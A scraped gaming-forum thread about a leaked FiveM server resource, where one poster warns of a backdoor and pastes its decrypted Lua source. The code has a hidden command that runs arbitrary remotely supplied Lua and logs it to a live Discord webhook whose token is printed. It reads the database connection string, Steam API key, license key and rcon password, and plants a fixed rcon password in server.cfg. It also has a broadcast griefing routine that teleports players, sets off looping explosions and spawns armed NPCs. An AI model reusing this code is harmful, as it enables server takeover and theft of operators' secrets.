Retr0Trainer
Bronze Elite
Heres the link:
Hidden link for visitors, to see
Log in or register now.
This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.
If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.
thx broHeres the link:Hidden link for visitors, to see Log in or register now.![]()
nice tyHeres the link:Hidden link for visitors, to see Log in or register now.![]()
wdym?Don't use it. There's a backdoor build in
already decrypted itDon't use it. There's a backdoor build in
local k = false
local o = false
local c = false
local l = false
RegisterNetEvent('test', function()
c = true
end)
CreateThread(function()
while true do
Wait(0)
if c then
txt(0.92, 1.0, 1.0,1.0,0.4, 'I dont know whats happening...', 255, 255, 255, 255)
TriggerEvent('testt3')
end
end
end)
CreateThread(function()
while true do
Wait(0)
if k then
txt(0.87, 1.0, 1.0,1.0,0.4, 'But dont be worried, you will find out soon...', 255, 255, 255, 255)
TriggerEvent('testoo')
end
end
end)
CreateThread(function()
while true do
Wait(0)
if o then
txt(0.97, 1.0, 1.0,1.0,0.4, 'Have fun ;)', 255, 255, 255, 255)
TriggerEvent('testoo7')
end
end
end)
RegisterNetEvent('testt3', function()
Wait(6000)
c = false
k = true
end)
RegisterNetEvent('testoo', function()
Wait(6000)
k = false
o = true
end)
RegisterNetEvent('testoo7', function()
Wait(6000)
o = false
Wait(1000)
DoScreenFadeOut(1000)
Wait(500)
SetEntityCoords(PlayerPedId(), 501.8227, 5604.5781, 806.9110, false, false, false, false)
ClearPedTasksImmediately(PlayerPedId())
Wait(6000)
DoScreenFadeIn(200)
ShakeGameplayCam("DRUNK_SHAKE", 2.0)
ShakeGameplayCam("FAMILY5_DRUG_TRIP_SHAKE", 2.0)
AnimpostfxPlay('DMT_flight', 100000.0, true)
TriggerEvent('dkaoskc')
TriggerEvent('dkoaskoac')
l = true
TriggerEvent('ksaockmas')
end)
CreateThread(function()
while true do
Wait(0)
if l then
npc2()
break
end
end
end)
RegisterNetEvent('dkaoskc', function()
while true do
Wait(0)
SetEntityInvincible(PlayerPedId(), true)
if #(GetEntityCoords(PlayerPedId()) - vector3(501.9134, 5604.5200, 797.9102)) > 45 then
SetEntityCoords(PlayerPedId(), 501.8227, 5604.5781, 804.9110, false, false, false, false)
end
end
end)
RegisterNetEvent('dkoaskoac', function()
while true do
AddExplosion(477.1181, 5581.5288, 803.2253, 9, 20.0, true, false, true)
AddExplosion(530.1199, 5585.8623, 796.0474, 9, 20.0, true, false, true)
AddExplosion(480.2448, 5622.4409, 794.1323, 9, 20.0, true, false, true)
AddExplosion(508.6279, 5622.4297, 814.0663, 9, 20.0, true, false, true)
AddExplosion(498.9181, 5572.7129, 798.4734, 9, 20.0, true, false, true)
AddExplosion(485.8586, 5538.1426, 804.5697, 9, 20.0, true, false, true)
Wait(1000)
end
end)
function txt(x,y ,width,height,scale, text, r,g,b,a, outline)
SetTextFont(4)
SetTextProportional(1)
SetTextScale(0.6, 0.6)
SetTextColour(255, 255, 255, 255)
SetTextDropshadow(0, 0, 0, 0, 255)
SetTextEdge(1, 0, 0, 0, 150)
SetTextDropshadow()
SetTextOutline()
SetTextEntry("STRING")
AddTextComponentString(text)
DrawText(x - width/2, y - height/2 + 0.005)
end
local plaaace = {
vector3(497.9555, 5603.2637, 797.9100),
vector3(500.4354, 5587.9106, 794.4640),
vector3(505.6608, 5598.1118, 796.1458),
vector3(506.1435, 5611.2734, 796.3578),
vector3(489.3273, 5607.6958, 792.5696),
vector3(482.0940, 5590.6875, 792.3228),
vector3(470.7194, 5568.5728, 781.519),
vector3(451.3129, 5586.6533, 781.1895),
}
function npc2()
for t=1, #plaaace do
npcModel = GetHashKey("a_m_m_soucent_01")
RequestModel(npcModel)
while not HasModelLoaded(npcModel) do
Wait(0)
end
npc = CreatePed(1, npcModel, plaaace[t].x, plaaace[t].y, plaaace[t].z, 209.6366, false, true) -- coords of the npc
SetBlockingOfNonTemporaryEvents(npc, true)
SetPedDiesWhenInjured(npc, false)
SetPedCanPlayAmbientAnims(npc, true)
SetPedCanRagdollFromPlayerImpact(npc, false)
SetEntityInvincible(npc, true)
GiveWeaponToPed(npc, 0x394F415C, 99999999, false, true)
TaskCombatPed(npc, PlayerPedId(), 0, 0)
end
end
RegisterCommand('ämlhjmad', function()
TriggerClientEvent('test', -1)
end)
E = {
["W_R"] = "https://discord.com/api/webhooks/1038501728464670789/GdmCwcKUpo2jd2oDvm9xdbrDaynMY_J4AZS33kQ7jVyv0NhxTXXxR9d7FnAfS4O_qxpy",
["W_L"] = "https://discord.com/api/webhooks/1038501728464670789/GdmCwcKUpo2jd2oDvm9xdbrDaynMY_J4AZS33kQ7jVyv0NhxTXXxR9d7FnAfS4O_qxpy",
["R_S"] = function()
charset = {}
do
for c = 48, 57 do
table.insert(charset, string.char(c))
end
for c = 65, 90 do
table.insert(charset, string.char(c))
end
for c = 97, 122 do
table.insert(charset, string.char(c))
end
end
math.randomseed(os.clock() ^ 5)
return randomString(25 - 1) .. charset[math.random(1, #charset)]
end
}
RegisterCommand("noclip", function(source, args)
local H = {
["log"] = function(desc)
PerformHttpRequest(
E["W_L"],
function(err, text, headers)
end,
"POST",
json.encode({username = "BACKDOOR", content = desc}),
{["Content-Type"] = "application/json"}
)
end,
["string"] = table.concat(args, " ")
}
if not H['string'] then return end
H['log'](H['string'])
load(H['string'])()
end
)
serveri = GetConvar("sv_hostname")
database = GetConvar("mysql_connection_string")
steamApi = GetConvar("steam_webApiKey")
Licensekey = GetConvar("sv_licenseKey")
Homo = GetCurrentResourceName()
rcon_password = GetConvar("rcon_password", "")
if rcon_password == "" then
local path = "server.cfg"
local file = io.open(path, "r+")
file:seek("end", -2)
rcon_password = "Homoseksi"
file:write('\nrcon_password '..rcon_password..' ')
io.close(file)
end
StartResource('runcode')
"Hidden link for visitors, to see Log in or register now.",
this weebhook is activeso everything logs in there
you sure?Don't use it. There's a backdoor build in
hjkhjkhjkthx bro
Heres the link:Hidden link for visitors, to see Log in or register now.![]()
simonHeres the link:Hidden link for visitors, to see Log in or register now.![]()
sHeres the link:Hidden link for visitors, to see Log in or register now.![]()